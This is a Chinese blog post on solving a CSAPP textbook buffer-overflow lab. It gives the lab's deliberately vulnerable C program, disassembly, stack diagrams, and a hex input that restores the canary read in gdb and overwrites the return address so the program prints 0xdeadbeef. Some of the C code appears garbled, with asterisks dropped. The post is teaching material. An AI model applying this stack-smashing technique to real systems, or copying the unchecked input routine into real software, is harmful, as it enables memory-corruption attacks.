缓存区溢出攻击实验

Jan 20, 2010

环境:kernel 2.6.31 gcc版本:4.4.1
这个是csapp 《深入理解计算机系统》的一道题,直接在原程序运行的时候实现缓存区溢出攻击已经不可能实现了,除非你是用的版本很低的内核和gcc,如gcc 3.4.3。

先是王珑珑同学做这道题,我也跟着做了下,花了挺长时间,这期间很感谢王珑珑同学的耐心讲解,thanks~~~

原题如下:

/* Bomb program that is solved using a buffer overflow attack */

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

/* Like gets, except that characters are typed as pairs of hex digits. 
 * Nondigit characters are ignored. Stops when encounters newline */ 
char getxs(char dest)
{
  int c;
  int even = 1; /* Have read even number of digits */ 
  int otherd = 0; /* Other hex digit of pair */ 
  char sp = dest; 
  while ((c = getchar()) != EOF && c != '\n') { 
    if (isxdigit(c)) {
      int val;
      if ('0' <= c && c <= '9')
        val = c - '0';
      else if ('A' <= c && c <= 'F')
        val = c - 'A' + 10;
      else
        val = c - 'a' + 10;
      if (even) {
        otherd = val;
        even = 0;
      } else {
        sp++ = otherd 16 + val;
        even = 1;
      }
    }
  }
  sp++ = '\0';
  return dest;
}

/* $begin getbuf-c */
int getbuf()
{
  char buf[12];
  getxs(buf);
  return 1;
}
void test()
{
  int val;
  printf("Type Hex string:");
  val = getbuf();
  printf("getbuf returned 0x%x\n", val);
}
/*$end getbuf-c */
int main()
{
  int buf[16];
  /* This little hack is an attempt to get the stack to be in a 
   * stable position *
   */
  int offset = (((int) buf) & 0xFFF);
  int space = (int ) alloca(offset);
  space = 0; /* So that don't get complaint of unused variable */
  test();
  return 0;
}

正常时程序退出时总是返回1,现在要求通过缓存区溢出,让程序返回0xdeadbeef。
注:(由于现在gcc在代码汇编代码中添加了%gs的缓存区溢出验证机制,所以如果gcc的版本较高,本实验只能在gdb下完成)

下面的网址是王珑珑童鞋的实现方式,他的gcc版本是4.3.3:http://hi.baidu.com/featherain/blog/item/99207b4ede9b2cf3d62afc1e.html(通过在缓存区中植入一段攻击代码,然后让getbuf() ret到缓存区攻击代码出,最后让攻击代码返回text())。较高版本的内核用这种方法会报“段错误”(因为程序跳转到了非法地址空间)。

下面是实现缓存区溢出攻击的另一种方式。
输入:|任意十二个字符的编码||%gs:0x14||任意8个字符的编码||getbuf栈贞的基地 址||text()中第二个printf()的地址||01 00 00 00 ||71 87 04 08||ef be ad de|

下面解释为什么用输入上面哪些字符来实现缓存区溢出攻击。
用gcc编译生成buffbomb.c的可执行程序后,用objdump反汇编发现getbuf的函数如下:

080485c0 :
215 80485c0:   55                      push   %ebp
216 80485c1:   89 e5                   mov    %esp,%ebp
217 80485c3:   83 ec 28                sub    $0x28,%esp
218 80485c6:   65 a1 14 00 00 00       mov    %gs:0x14,%eax
219 80485cc:   89 45 f4                mov    %eax,-0xc(%ebp)
220 80485cf:   31 c0                   xor    %eax,%eax
221 80485d1:   8d 45 e8                lea    -0x18(%ebp),%eax
222 80485d4:   89 04 24                mov    %eax,(%esp)
223 80485d7:   e8 44 ff ff ff          call   8048520
224 80485dc:   b8 01 00 00 00          mov    $0x1,%eax
225 80485e1:   8b 55 f4                mov    -0xc(%ebp),%edx
226 80485e4:   65 33 15 14 00 00 00    xor    %gs:0x14,%edx
227 80485eb:   75 02                   jne    80485ef
228 80485ed:   c9                      leave
229 80485ee:   c3                      ret
230 80485ef:   90                      nop
231 80485f0:   e8 57 fe ff ff          call   804844c <__stack_chk_fail@plt>
232 80485f5:   8d 74 26 00             lea    0x0(%esi,%eiz,1),%esi
233 80485f9:   8d bc 27 00 00 00 00    lea    0x0(%edi,%eiz,1),%edi

发现第217行:sub $0x28, %esp 即为getbuf()申请了40个字节的堆栈空间,我们申请的数组是从当前基址偏移24个字节开始的,负责检查缓存区溢出的%gs:0x14是从当前基址偏移12个字节开始的。
(注:4.4.1以前的版本char数组是从当前基址偏移16个字节处开始,负责检查缓存区溢出的%gs:0x14是从当前基址偏移4个字节开始的)

查看test()函数:

08048600 :
236 8048600:   55                      push   %ebp
237 8048601:   89 e5                   mov    %esp,%ebp
238 8048603:   83 ec 18                sub    $0x18,%esp
239 8048606:   c7 44 24 04 60 87 04    movl   $0x8048760,0x4(%esp)
240 804860d:   08
241 804860e:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
242 8048615:   e8 f2 fd ff ff          call   804840c <__printf_chk@plt>
243 804861a:   e8 a1 ff ff ff          call   80485c0
244 804861f:   c7 44 24 04 71 87 04    movl   $0x8048771,0x4(%esp)
245 8048626:   08
246 8048627:   c7 04 24 01 00 00 00    movl   $0x1,(%esp)
247 804862e:   89 44 24 08             mov    %eax,0x8(%esp)
248 8048632:   e8 d5 fd ff ff          call   804840c <__printf_chk@plt>
249 8048637:   c9                      leave
250 8048638:   c3                      ret
251 8048639:   8d b4 26 00 00 00 00    lea    0x0(%esi,%eiz,1),%esi

从244行起是关键,246行是把指针指向位置设为1,由此猜测%esp存放的可能是printf的参数数目,247行是把eax的值压到esp+8的位置,由上面的getbuf的代码我们知道eax存放的是getbuf的返回值,所以我们只需要在调用call printf之前把0xdeadbeef压入esp+8的位置就可以实现我们的目的了。

正常时整个堆栈的情况如下所示:

——————
%eax
——————
0x8048771
——————
0x1                       <----esp
——————
返回地址(call getbuf下一条指令)
——————
%ebp
——————
8个字节
——————
%gs:0x14
——————
12个字节
——————

至此整体的思路已经有了:通过缓存区溢出修改printf的相关参数和getbuf()ret的地址,使之跳过call getbuf和call printf之间的代码,直接执行printf。即如下形式:

——————
0xdeadbeef
——————
0x8048771
——————
0x1                       <----esp
——————
返回地址(call printf的地址)
——————
%ebp
——————
8个字节
——————
%gs:0x14
——————
12个字节
——————

具体实现过程如下:
1.在getbuf中创建断点,得到%gs:0x14的值,读出ebp中存放的值
2.输入任意十二个字符填满char[12],继续输入%gs:0x14的值,迫使程序检查不出缓存区溢出,填满栈贞剩下的8个字节,输入ebp中存放的值,test()中call printf的地址,0x1,0x8048771,0xdeadbeef

即:aa aa aa aa aa aa aa aa aa aa aa aa 00 99 dd 78 11 11 11 11 11 11 11 11 d8 ef ff bf 32 86 04 08 01 00 00 00 71 87 04 08 ef bf ad de

总结;虽然实现了return 0xdeadbeef的目的,但是实际应用价值不大,尤其是%gs:0x14每次的值都会变化,所以只能在gdb模式下得到%gs:0x14的值然后在溢出时刻意将其添回,才不会被程序发现缓存区溢出,随着gcc的越变越聪明,给人的可趁之机也越来越少

Comments

  1. 牛B啊! xiu bia!

    Avatar

Get In Touch With Us ...